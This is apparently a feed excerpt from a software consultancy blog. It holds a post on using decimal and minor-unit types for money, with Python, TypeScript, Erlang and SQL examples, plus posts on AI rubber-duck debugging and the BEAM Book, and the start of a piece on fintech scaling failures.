&lt;p&gt;JSON is everywhere: in APIs, logs, NoSQL databases, Kafka streams, and config files. But it doesn’t support real numbers.&lt;/p&gt;
&lt;p&gt;JSON has one “number” type. There’s no distinction between:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Integer or float&lt;/li&gt;
&lt;li&gt;Decimal or exponential&lt;/li&gt;
&lt;li&gt;Currency, percent, duration, or count&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This means:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&amp;quot;amount&amp;quot;: 99.99 could be a float (in JS), a Decimal (in Python), or a BigDecimal (in Java)&lt;/li&gt;
&lt;li&gt;Many serializers silently round, truncate, or lose precision&lt;/li&gt;
&lt;li&gt;You can’t even tell if 99.99 is a valid business value without knowing the intended type&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Worse, many languages parse JSON numbers as floats by default. That means even if you store exact values, your application might read them imprecisely.&lt;/p&gt;
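&lt;p&gt;The fix is to take control at the parse boundary. In Python, for example, &lt;code&gt;json.loads&lt;/code&gt; accepts a &lt;code&gt;parse_float&lt;/code&gt; hook; other ecosystems have equivalents:&lt;/p&gt;

```python
import json
from decimal import Decimal

doc = '{"amount": 99.99}'

# Default: the JSON number becomes a binary float.
naive = json.loads(doc)
assert isinstance(naive['amount'], float)

# With a parse hook, the textual value is preserved exactly.
exact = json.loads(doc, parse_float=Decimal)
assert exact['amount'] == Decimal('99.99')
assert exact['amount'] * 3 == Decimal('299.97')
```

&lt;p&gt;Even then the hook only protects your side of the wire; the safest interchange format is still an integer amount in minor units plus an explicit currency field.&lt;/p&gt;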
&lt;div class=&quot;blog-sidebar&quot;&gt;
&lt;h3&gt; COBOL-Structured but Not Safe&lt;/h3&gt;
One of the oldest languages still in use, &lt;b&gt;COBOL&lt;/b&gt;, often enforces more financial structure than many modern systems. Data is explicitly defined using &lt;code&gt;PIC&lt;/code&gt; clauses:
&lt;pre&gt;&lt;code class=&quot;language-cobol&quot;&gt;05 AMOUNT         PIC 9(7)V99.  *&amp;gt; 9999999.99
05 CURRENCY-CODE  PIC X(3).     *&amp;gt; ISO-4217
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This enforces field width, scale, and sometimes even units by convention. No wonder many banks still use COBOL.&lt;/p&gt;
&lt;p&gt;But COBOL lacks semantic typing; you get structure without meaning. Rigid, but still brittle when misunderstood.&lt;/p&gt;
&lt;/div&gt;
&lt;p&gt;You can’t trust what you can’t type.&lt;/p&gt;
&lt;h2 id=&quot;what-you-should-do-instead&quot; tabindex=&quot;-1&quot;&gt;What You Should Do Instead&lt;/h2&gt;
&lt;h3 id=&quot;typed-systems-are-better-systems&quot; tabindex=&quot;-1&quot;&gt;Typed systems are better systems.&lt;/h3&gt;
&lt;h4&gt;1.	Make units explicit&lt;/h4&gt;
&lt;p&gt;To encode 100.00 Euro:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{
  &amp;quot;amount&amp;quot;: 10000,
  &amp;quot;currency&amp;quot;: &amp;quot;EUR&amp;quot;,
  &amp;quot;minor_unit&amp;quot;: true
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h4&gt;2.	Use the right types&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Replace float with decimal&lt;/li&gt;
&lt;li&gt;Use real bool and datetime types&lt;/li&gt;
&lt;li&gt;Never store “truth” as &amp;quot;yes&amp;quot; or &amp;quot;Y&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;3.	Model the domain&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Create types like VatRate, TransactionAmount, IsoTimestamp&lt;/li&gt;
&lt;li&gt;Make illegal states unrepresentable&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;4.	Validate at the edges&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;APIs should reject ambiguity, not propagate it&lt;/li&gt;
&lt;li&gt;Fail fast when types or units are missing&lt;/li&gt;
&lt;/ul&gt;
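&lt;p&gt;A boundary check can be this small. This is a hand-rolled sketch; in practice a schema validator plays this role, and the field names follow the earlier JSON example:&lt;/p&gt;

```python
VALID_CURRENCIES = {'USD', 'EUR', 'GBP', 'SEK'}

def parse_money(payload):
    # Fail fast: every required field, with the right type, or no object at all.
    amount = payload.get('amount')
    currency = payload.get('currency')
    if not isinstance(amount, int):
        raise ValueError('amount must be an integer in minor units')
    if currency not in VALID_CURRENCIES:
        raise ValueError('currency must be a known ISO-4217 code')
    return {'amount_minor': amount, 'currency': currency}

ok = parse_money({'amount': 10000, 'currency': 'EUR'})
assert ok['amount_minor'] == 10000

try:
    parse_money({'amount': 99.99, 'currency': 'EUR'})  # float amount: rejected
    raise AssertionError('should have failed')
except ValueError:
    pass
```

&lt;p&gt;Everything past this function can then assume integer minor units and a known currency; the ambiguity dies at the edge instead of propagating.&lt;/p&gt;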
&lt;h3 id=&quot;type-theory-briefly&quot; tabindex=&quot;-1&quot;&gt;Type Theory, Briefly&lt;/h3&gt;
&lt;p&gt;Types aren’t just for compilers. They encode meaning. They help humans and machines distinguish between:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;100 SEK vs 100%&lt;/li&gt;
&lt;li&gt;net_total vs gross_total&lt;/li&gt;
&lt;li&gt;sent_at vs due_date&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;Use types if you have them&lt;/h4&gt;
&lt;p&gt;In languages with strong type systems you can make these distinctions explicit:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-typescript&quot;&gt;// ISO 4217 currency codes (could use an enum)
type CurrencyCode = &#39;USD&#39; | &#39;EUR&#39; | &#39;GBP&#39; | &#39;JPY&#39;;

interface Money {
    // always in the smallest currency unit
    // (e.g. cents, pence)
  amountMinor: number;
  currency: CurrencyCode;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When done well, the compiler helps you prevent bugs. Your system becomes self-documenting and harder to misuse.&lt;/p&gt;
&lt;h4&gt;Fake types if you don&#39;t&lt;/h4&gt;
&lt;p&gt;Even in dynamically typed languages, you can fake it:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Use structs, classes, or schema validators&lt;/li&gt;
&lt;li&gt;Separate field names with intent (e.g. gross_eur_cents)&lt;/li&gt;
&lt;li&gt;Build linter rules that enforce domain conventions&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;An example in Erlang:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%%%-----------------------------------------------------------------
%%% money.hrl - record definition
%%%-----------------------------------------------------------------
-record(money, {
    amount_minor :: integer(),     % always in minor units (cents, öre)
    currency     :: currency()     % ISO-4217 atom
}).

-type currency() :: usd | eur | gbp | sek.
-type money()    :: #money{}.
-export_type([currency/0, money/0]).
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%%%-----------------------------------------------------------------
%%% money.erl
%%%-----------------------------------------------------------------
-module(money).
-export([new/2, add/2, format/1]).

-include(&amp;quot;money.hrl&amp;quot;).

-spec new(integer(), currency()) -&amp;gt; money().
new(AmountMinor, Cur) when
        is_integer(AmountMinor),
        AmountMinor &amp;gt;= 0,
        %% parenthesised orelse: a bare semicolon would OR away the checks above
        (Cur =:= usd orelse Cur =:= eur orelse
         Cur =:= gbp orelse Cur =:= sek) -&amp;gt;
    #money{amount_minor = AmountMinor, currency = Cur}.

-spec add(money(), money()) -&amp;gt; money().
add(#money{currency = C, amount_minor = A1},
    #money{currency = C, amount_minor = A2}) -&amp;gt;
    #money{currency = C, amount_minor = A1 + A2};
add(_, _) -&amp;gt;
    error(currency_mismatch).

-spec format(money()) -&amp;gt; binary().
format(#money{amount_minor = Amt, currency = Cur}) -&amp;gt;
    Major = Amt div 100,
    Minor = Amt rem 100,
    iolist_to_binary(io_lib:format(&amp;quot;~p.~2..0B ~p&amp;quot;, [Major, Minor, Cur])).
&lt;/code&gt;&lt;/pre&gt;
&lt;h4&gt;Or at least pretend&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;Naming-as-Type&lt;/em&gt; is what you use when you really have nothing else.
If the tech stack is a bash script, a SQL view, or a low-code platform, fall back to semantic variable names:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-sql&quot;&gt;ALTER TABLE invoices
ADD COLUMN gross_eur_cents BIGINT NOT NULL DEFAULT 0,
ADD COLUMN vat_rate_pct    NUMERIC(5,2) NOT NULL DEFAULT 0;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In PostgreSQL (and, to varying degrees, other modern dialects) you can go further
and use domains and composite types to achieve real type safety.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-sql&quot;&gt;-- 1. A domain for minor-unit amounts (cents, öre, pence …)
CREATE DOMAIN minor_money
AS bigint                               -- large enough for 9 223 372 036 854 775 807 cents
CHECK (VALUE &amp;gt;= 0);

-- 2. A domain for currency codes (exactly three uppercase A-Z letters)
CREATE DOMAIN currency_code
AS char(3)
CHECK (VALUE ~ &#39;^[A-Z]{3}$&#39;);

-- 3. A composite type that glues the two together
CREATE TYPE money_value AS (
  amount_minor minor_money,
  currency     currency_code
);

-- 4. Example table using the new type
CREATE TABLE invoice_line (
  id           serial PRIMARY KEY,
  description  text NOT NULL,
  total_net    money_value NOT NULL,
  vat_amount   money_value NOT NULL,
  total_gross  money_value NOT NULL
);
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code class=&quot;language-sql&quot;&gt;INSERT INTO invoice_line (description, total_net, vat_amount, total_gross)
VALUES
  (&#39;10 kg mozzarella&#39;,
   ROW(100000, &#39;EUR&#39;)::money_value,   -- €1 000.00 net
   ROW( 25000, &#39;EUR&#39;)::money_value,   -- €  250.00 VAT
   ROW(125000, &#39;EUR&#39;)::money_value);  -- €1 250.00 gross
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id=&quot;the-real-problem&quot; tabindex=&quot;-1&quot;&gt;The Real Problem&lt;/h2&gt;
&lt;p&gt;Modern languages make it easy to move fast without structure.
That’s fine in early prototypes. But financial systems are long-lived.
Without structure, every layer you build sits on sand.&lt;/p&gt;
&lt;p&gt;The cost? Every ambiguous field becomes a future incident.
Every vague type becomes a blocker to automation.&lt;/p&gt;
&lt;p&gt;You can pay that cost now, through type safety and clear structure.
Or you can pay it later, through failed audits, reconciliation hell, and broken trust.&lt;/p&gt;
&lt;h3 id=&quot;performance-myths&quot; tabindex=&quot;-1&quot;&gt;Performance Myths&lt;/h3&gt;
&lt;p&gt;If you&#39;re concerned about throughput or message size, remember that the overhead of serializing JSON or XML already dwarfs the cost of a type-safe &lt;code&gt;add(Money)&lt;/code&gt; function.&lt;/p&gt;
&lt;p&gt;Machine-level addition is fast, but the bugs caused by mixing currencies or losing precision will cost far more.&lt;/p&gt;
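&lt;p&gt;A rough sketch of that claim: a million guarded additions is still just integer math plus one string comparison each (the names and counts here are illustrative):&lt;/p&gt;

```typescript
interface Money { amountMinor: number; currency: string; }

function add(a: Money, b: Money): Money {
  if (a.currency !== b.currency) throw new Error('currency mismatch');
  return { amountMinor: a.amountMinor + b.amountMinor, currency: a.currency };
}

// One million cent-sized additions: the guard is one string compare each.
let total: Money = { amountMinor: 0, currency: 'EUR' };
for (let i = 1000000; i > 0; i--) {
  total = add(total, { amountMinor: 1, currency: 'EUR' });
}
console.log(total.amountMinor);   // 1000000
```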
&lt;h2 id=&quot;closing-thought&quot; tabindex=&quot;-1&quot;&gt;Closing Thought&lt;/h2&gt;
&lt;p&gt;Finance runs on trust.
Trust requires clarity.
Clarity requires types.&lt;/p&gt;
&lt;p&gt;If you’re still shipping Excel-style data into your APIs, databases, and ledgers, then you’re shipping risk.&lt;/p&gt;
&lt;p&gt;Typed data isn’t a nice-to-have.
It’s a trust contract.&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;I barely scratched the surface here. For related material on how bad architecture compounds these problems, see &lt;a href=&quot;https://happihacking.com/blog/posts/2025/payment_architecture/&quot;&gt;The Hidden Cost of Bad Payment Architecture&lt;/a&gt;. For a practical look at how Erlang handles these workloads at scale, see &lt;a href=&quot;https://happihacking.com/blog/posts/2024/erlang_for_fintech/&quot;&gt;How Erlang Powers High-Volume Finance&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If you&#39;d like deeper material, whether a full book or a hands-on course, please let me know.&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;Need a second pair of eyes on your data contracts or payment architecture?
&lt;strong&gt;Let’s talk → &lt;a href=&quot;mailto:info@happihacking.se&quot;&gt;info@happihacking.se&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>AI Rubber Ducking: When Your Duck Starts Talking Back</title>
    <link href="https://happihacking.com/blog/posts/2025/ai_duck/"/>
    <updated>2025-04-01T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/ai_duck/</id>
    <summary>Debugging with an AI duck, helpful, but slightly quackers</summary>
    <content type="html">&lt;h1 id=&quot;ai-rubber-ducking-when-your-duck-starts-talking-back&quot; tabindex=&quot;-1&quot;&gt;AI Rubber Ducking: When Your Duck Starts Talking Back&lt;/h1&gt;
&lt;p&gt;We’ve all been there. Your code isn’t working, you&#39;re on your third coffee, and explaining your logic out loud to a literal rubber duck somehow feels perfectly reasonable. This method, known as &amp;quot;rubber duck debugging&amp;quot;, forces you to verbalize the problem, turning vague frustration into clear insight. But what if, instead of silent, judgmental stares, your rubber duck could actually respond?&lt;/p&gt;
&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/rubberducking.jpg&quot; alt=&quot;Me pointing at a computer with a rubber duck on the side.&quot; title=&quot;Me pointing at a computer with a rubber duck on the side.&quot; /&gt;&lt;/p&gt;
&lt;h2 id=&quot;rubber-duck-debugging-briefly-explained&quot; tabindex=&quot;-1&quot;&gt;Rubber Duck Debugging, Briefly Explained&lt;/h2&gt;
&lt;p&gt;If you&#39;ve never heard of rubber duck debugging, here’s the gist: you talk your code through line-by-line to an inanimate duck (or a coffee mug, or a slightly confused co-worker). The mere act of explaining forces your brain to slow down, reconsider assumptions, and often leads you straight to the source of the problem.&lt;/p&gt;
&lt;p&gt;Now, enter AI.&lt;/p&gt;
&lt;h2 id=&quot;ai-joins-the-debugging-party&quot; tabindex=&quot;-1&quot;&gt;AI Joins the Debugging Party&lt;/h2&gt;
&lt;p&gt;AI-powered tools like ChatGPT have started stepping in as your conversational coding partner. Instead of blank stares from a rubber toy, you now get questions, clarifications, and the occasional helpful nudge from an attentive AI. This might sound great, or terrifyingly close to &amp;quot;AI writes your code for you,&amp;quot; but that&#39;s not quite the point.&lt;/p&gt;
&lt;p&gt;Here&#39;s a crucial distinction: &lt;strong&gt;this is not about letting AI blindly spit out code snippets for you to paste without thinking&lt;/strong&gt;. That way lies madness, chaos, and production incidents at 3 AM. Instead, it’s about enhancing your understanding of the code you&#39;re writing, using the AI as a thoughtful listener who challenges your assumptions and gently prods you toward insight.&lt;/p&gt;
&lt;h2 id=&quot;why-letting-ai-write-your-code-is-a-terrible-idea&quot; tabindex=&quot;-1&quot;&gt;Why Letting AI Write Your Code Is a Terrible Idea&lt;/h2&gt;
&lt;p&gt;Let’s pause briefly to clarify something important:&lt;/p&gt;
&lt;p&gt;Yes, AI can generate code. Sometimes it&#39;s even correct. But if you blindly copy-paste AI-generated code, you’ve basically summoned a gremlin into your codebase. Good luck debugging a solution generated by a statistical model trained on half the internet’s JavaScript hacks and Stack Overflow workarounds.&lt;/p&gt;
&lt;p&gt;Instead, the real power of using AI for rubber duck debugging is helping you articulate your problem and thought process. You remain in charge. It&#39;s your logic, your code. But now you have a conversational partner to bounce ideas off.&lt;/p&gt;
&lt;h2 id=&quot;how-ai-ducking-helps-you-the-developer&quot; tabindex=&quot;-1&quot;&gt;How AI Ducking Helps You (the Developer)&lt;/h2&gt;
&lt;p&gt;Here&#39;s why chatting with an AI rubber duck is surprisingly effective:&lt;/p&gt;
&lt;p&gt;Explaining your problem in detail forces clarity. When you describe your bug or logical flaw to an AI, you have to strip away assumptions and present things simply. By doing this, you immediately spot those sneaky gaps or logical inconsistencies.&lt;/p&gt;
&lt;p&gt;The AI’s questions can prompt you to think about your code differently. Rather than just silently nodding along, an AI can gently interrupt your flow and say something like, &amp;quot;Wait, what happens if &lt;code&gt;x&lt;/code&gt; is empty?&amp;quot; Suddenly you&#39;re forced to consider edge cases or logic branches you&#39;ve overlooked.&lt;/p&gt;
&lt;p&gt;It’s always there, awake, caffeinated (in the digital sense), and ready to debug with you, even when your team isn&#39;t. No more waiting until morning to untangle the mess you made at 2 AM.&lt;/p&gt;
&lt;h2 id=&quot;practical-tips-for-using-ai-as-a-rubber-duck&quot; tabindex=&quot;-1&quot;&gt;Practical Tips for Using AI as a Rubber Duck&lt;/h2&gt;
&lt;p&gt;Here’s how to best leverage AI in your debugging sessions:&lt;/p&gt;
&lt;p&gt;First, clearly articulate your issue: what should your code do, and what is it actually doing? Imagine you’re explaining it to someone who has no context at all.&lt;/p&gt;
&lt;p&gt;Next, provide only relevant snippets, enough context without drowning your duck in noise. This helps maintain your own clarity too.&lt;/p&gt;
&lt;p&gt;Finally, actively engage with the AI’s questions and suggestions. Don&#39;t just ask for answers, but use the dialogue to challenge your own assumptions and deepen your understanding.&lt;/p&gt;
&lt;h3 id=&quot;suggested-prompts&quot; tabindex=&quot;-1&quot;&gt;Suggested prompts&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Problem Description Prompts&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&amp;quot;Let me explain this code snippet to you. Point out any logical inconsistencies or gaps in my explanation.&amp;quot;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&amp;quot;Here&#39;s what I want my function to do [short description]. Here’s how I&#39;m approaching it. What scenarios might I have missed?&amp;quot;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Code Understanding Prompts&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&amp;quot;Can you restate the logic of my code snippet in simpler terms? I want to see if I clearly understand what I&#39;ve written.&amp;quot;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&amp;quot;Let me describe how this should work step-by-step. Please interrupt if something doesn’t make sense or seems incomplete.&amp;quot;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Edge-Case Identification Prompts&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&amp;quot;I think I&#39;ve covered all edge cases. Challenge me: are there conditions I haven’t accounted for?&amp;quot;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&amp;quot;I feel confident about my implementation. Double-check me: are there scenarios I might have overlooked?&amp;quot;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Debugging Assistance Prompts&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&amp;quot;My code isn&#39;t working. Before giving suggestions, ask me clarifying questions to help me understand why it might be failing.&amp;quot;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&amp;quot;Ask me about assumptions I&#39;ve made in this code snippet. Help me realize what I might be taking for granted.&amp;quot;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Or you can try my &lt;a href=&quot;https://chatgpt.com/g/g-67eba815fd4081919181e486d2ad08cc-rubber-duck-debugger&quot;&gt;Rubber Duck Debugger&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&quot;conclusion-or-embrace-the-quack&quot; tabindex=&quot;-1&quot;&gt;Conclusion (Or, Embrace the Quack)&lt;/h2&gt;
&lt;p&gt;AI-powered rubber ducking won&#39;t replace traditional debugging or your team’s code reviews. But it does offer a helpful middle ground between coding alone and having a conversation partner always available. The goal is not about magically solving your problems, but about helping &lt;em&gt;you&lt;/em&gt; understand your problems clearly enough to fix them yourself.&lt;/p&gt;
&lt;p&gt;So next time your code misbehaves, try talking it through with an AI duck. It might just quack you up, and lead you straight to the solution.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>The BEAM Book Is Almost Done. Here&#39;s What Writing It Taught Me.</title>
    <link href="https://happihacking.com/blog/posts/2025/the_beam_book_lessons/"/>
    <updated>2025-03-25T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/the_beam_book_lessons/</id>
    <summary>Reflections on scope, clarity, and the joys of letting go.</summary>
    <content type="html">&lt;h1 id=&quot;the-project-nears-completion&quot; tabindex=&quot;-1&quot;&gt;The Project Nears Completion&lt;/h1&gt;
&lt;p&gt;I set out to document everything I knew about the BEAM, and to discover everything I didn&#39;t yet know.
I thought it would be straightforward: outline the architecture, show some code, sprinkle in a few anecdotes. Then I discovered how challenging it is to make concurrency, schedulers, and message passing sound simple.&lt;/p&gt;
&lt;a href=&quot;https://github.com/happi/theBeamBook/releases/latest/&quot;&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/simplicity.jpg&quot; alt=&quot;A complex pipe system from my heater.&quot; title=&quot;A complex pipe system from my heater.&quot; /&gt;&lt;/a&gt;
&lt;p&gt;The manuscript is now nearly complete. I’m fine-tuning the final chapters and making sure the structure doesn’t collapse under its own ambition. It turns out that writing about concurrency requires you to manage your own concurrency crisis: the steady flood of ideas vs. the reality of limited pages and time.&lt;/p&gt;
&lt;h1 id=&quot;clarity-over-complexity&quot; tabindex=&quot;-1&quot;&gt;Clarity Over Complexity&lt;/h1&gt;
&lt;p&gt;Early drafts tried to cover every corner case. I believed completeness was the gold standard. But readers gravitated to the simpler chapters, the ones that made a single concept click. I realized that the trick to explaining concurrency is being hyper-focused on practical examples, then trusting readers to explore deeper if they choose. If I can’t make a concept accessible to a motivated beginner, maybe I don’t understand it well enough.&lt;/p&gt;
&lt;p&gt;It turns out there were quite a few of those concepts...&lt;/p&gt;
&lt;h1 id=&quot;reigning-in-the-tools&quot; tabindex=&quot;-1&quot;&gt;Reining in the Tools&lt;/h1&gt;
&lt;p&gt;At one point, I considered writing entire sections on every tracing flag, every debug mode, and every esoteric performance trick. The problem is that readers don’t need an encyclopedia; they need reasons. Tracing is important because you suspect a race condition. Profiling matters because you’re chasing a sneaky performance bottleneck. Tools are only interesting when they solve real problems, so that became my new guiding principle.&lt;/p&gt;
&lt;h1 id=&quot;ruthless-scoping&quot; tabindex=&quot;-1&quot;&gt;Ruthless Scoping&lt;/h1&gt;
&lt;p&gt;I had to remove or postpone entire topics: dirty schedulers, advanced NIF usage, and extended ERTS internals. They’re fascinating but not essential to the book’s main goal. Each time I felt guilty about cutting something, I remembered that overwhelming readers helps no one. The hardest part of writing isn’t the explaining, it’s choosing what to leave out.&lt;/p&gt;
&lt;h1 id=&quot;final-touches&quot; tabindex=&quot;-1&quot;&gt;Final Touches&lt;/h1&gt;
&lt;p&gt;I’m wrapping up the final chapters, polishing details around logging and monitoring to reflect the latest OTP releases. The open source version is already up on GitHub under Creative Commons, where I push new updates as soon as they’re ready.&lt;/p&gt;
&lt;p&gt;See &lt;a href=&quot;https://github.com/happi/theBeamBook&quot;&gt;theBeamBook&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Once the manuscript feels rock-solid, I’ll bundle it into a formal 1.0 release. A print edition will follow for those who still enjoy the feel of paper or need something sturdy to stop the table from wobbling.&lt;/p&gt;
&lt;a href=&quot;https://blog.stenmans.org/theBeamBook/&quot;&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/beam_book_cover.png&quot; alt=&quot;A draft of the cover for the beam book.&quot; title=&quot;A draft of the cover for the beam book.&quot; /&gt;&lt;/a&gt;
&lt;h1 id=&quot;how-you-can-help&quot; tabindex=&quot;-1&quot;&gt;How You Can Help&lt;/h1&gt;
&lt;p&gt;If you’ve skimmed any parts of the work or tried some examples, I welcome your feedback. Tell me if something is too dense, too vague, or too boring. Yes, that last category is real, and I’d rather know before the book hits the press.&lt;/p&gt;
&lt;h1 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h1&gt;
&lt;p&gt;Writing this book taught me to finally stop adding things, cut what&#39;s unnecessary, and accept when it&#39;s good enough.&lt;/p&gt;
&lt;p&gt;If the book helps someone troubleshoot a gnarly bug or finally understand why the BEAM is so special, it&#39;s done its job. For the full story behind the decade-long writing process, see &lt;a href=&quot;https://happihacking.com/blog/posts/2025/why_I_wrote_theBEAMBook/&quot;&gt;Why I Wrote the BEAM Book&lt;/a&gt;. For the broader context of BEAM&#39;s evolution over the decades, see &lt;a href=&quot;https://happihacking.com/blog/posts/2023/erlang-history/&quot;&gt;Three Decades with Erlang&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Thanks to everyone who has shared feedback and encouragement along the way. You’ve shaped this project more than you know. And if you discover something confusing, or you see a spot where you’d love more detail, let me know before I release the final print version. Writing about concurrency is fun, but improving it with your input is even better.&lt;/p&gt;
&lt;p&gt;Want a heads-up when the print version drops? Just email &lt;a href=&quot;mailto:info@happihacking.se&quot;&gt;info@happihacking.se&lt;/a&gt; and I’ll add you to the list.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Why Some Fintechs Scale Seamlessly, and Others Crash and Burn</title>
    <link href="https://happihacking.com/blog/posts/2025/fintech_fails/"/>
    <updated>2025-03-18T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/fintech_fails/</id>
    <summary>Most fintech backends break under pressure. Yours doesn&#39;t have to.</summary>
    <content type="html">&lt;p&gt;Fintech is a ruthless game. When your backend crashes, the consequences are serious. Transactions freeze, customers panic, and regulators start sending you very unfriendly letters.&lt;/p&gt;
&lt;p&gt;I&#39;ve spent decades building financial backends, from &lt;a href=&quot;https://happihacking.com/blog/posts/2023/Installment_plans/&quot;&gt;Klarna&#39;s early days&lt;/a&gt; to scaling systems for companies like RedCare, Aeternity, &lt;a href=&quot;https://happihacking.com/blog/posts/2023/iot_pipeline/&quot;&gt;Deutsche Telekom&lt;/a&gt;, and &lt;a href=&quot;https://happihacking.com/blog/posts/2023/delta/&quot;&gt;Delta Exchange&lt;/a&gt;. The secret to successful fintech scaling involves performance and compliance in equal measure.&lt;/p&gt;
&lt;p&gt;Let’s unpack why fintech backends break and how smart companies keep everything running smoothly.&lt;/p&gt;
&lt;h2 id=&quot;epic-scaling-fails-and-what-we-can-learn&quot; tabindex=&quot;-1&quot;&gt;Epic Scaling Fails (And What We Can Learn)&lt;/h2&gt;
&lt;h3 id=&quot;solaris-bank-fast-growth-meets-regulatory-nightmare&quot; tabindex=&quot;-1&quot;&gt;Solaris Bank: Fast Growth Meets Regulatory Nightmare&lt;/h3&gt;
&lt;p&gt;Solaris Bank exploded in popularity as a banking-as-a-service platform. Unfortunately, they moved so quickly they left compliance behind. Germany&#39;s BaFin eventually stepped in, banning new customer sign-ups and slapping Solaris with a €6.5M fine.&lt;/p&gt;
&lt;p&gt;Compliance should be the foundation of your fintech strategy, not something you add later.&lt;/p&gt;
&lt;h3 id=&quot;n26-growth-gone-wild&quot; tabindex=&quot;-1&quot;&gt;N26: Growth Gone Wild&lt;/h3&gt;
&lt;p&gt;N26 scaled rapidly but overlooked crucial anti-money-laundering systems. Regulators capped their growth at 50,000 new customers per month and handed them a painful €9.2M fine.&lt;/p&gt;
&lt;p&gt;This illustrates clearly that technology and compliance need to scale simultaneously.&lt;/p&gt;
&lt;h3 id=&quot;trustly-the-ipo-that-never-happened&quot; tabindex=&quot;-1&quot;&gt;Trustly: The IPO That Never Happened&lt;/h3&gt;
&lt;p&gt;Trustly faced major issues due to weak customer verification processes, especially in gambling transactions. As a result, they received an €11M fine, and their highly anticipated IPO was canceled.&lt;/p&gt;
&lt;p&gt;Transaction volume alone doesn&#39;t guarantee success without solid compliance systems.&lt;/p&gt;
&lt;h3 id=&quot;swish-even-giants-can-trip&quot; tabindex=&quot;-1&quot;&gt;Swish: Even Giants Can Trip&lt;/h3&gt;
&lt;p&gt;Swish, a well-established fintech service, recently encountered several disruptions. On Christmas Eve (December 24-25, 2024), Swish suffered significant downtime during peak hours, causing issues for more than 24 hours. Additional problems included temporary outages affecting Skandiabanken transactions (March 18, 2025), an ECB-related downtime (March 5, 2025), API disruptions linked to Swedbank Pay (January 20 and March 11, 2025), and a brief 15-minute outage (July 1, 2024).&lt;/p&gt;
&lt;p&gt;These cases underscore the necessity of robust monitoring and clear communication channels.&lt;/p&gt;
&lt;h2 id=&quot;how-smart-fintechs-scale-smoothly&quot; tabindex=&quot;-1&quot;&gt;How Smart Fintechs Scale Smoothly&lt;/h2&gt;
&lt;p&gt;Successful fintechs follow clear strategies to achieve seamless growth.&lt;/p&gt;
&lt;h3 id=&quot;delta-exchange-compliance-at-high-speed&quot; tabindex=&quot;-1&quot;&gt;Delta Exchange: Compliance at High Speed&lt;/h3&gt;
&lt;p&gt;Delta Exchange scaled their crypto platform smoothly despite intense regulatory oversight. They built compliance directly into their backend, processing over $300M in daily trades and onboarding 100,000 users without issues.&lt;/p&gt;
&lt;p&gt;Compliance is integral for both speed and stability.&lt;/p&gt;
&lt;h3 id=&quot;finoa-making-compliance-an-advantage&quot; tabindex=&quot;-1&quot;&gt;Finoa: Making Compliance an Advantage&lt;/h3&gt;
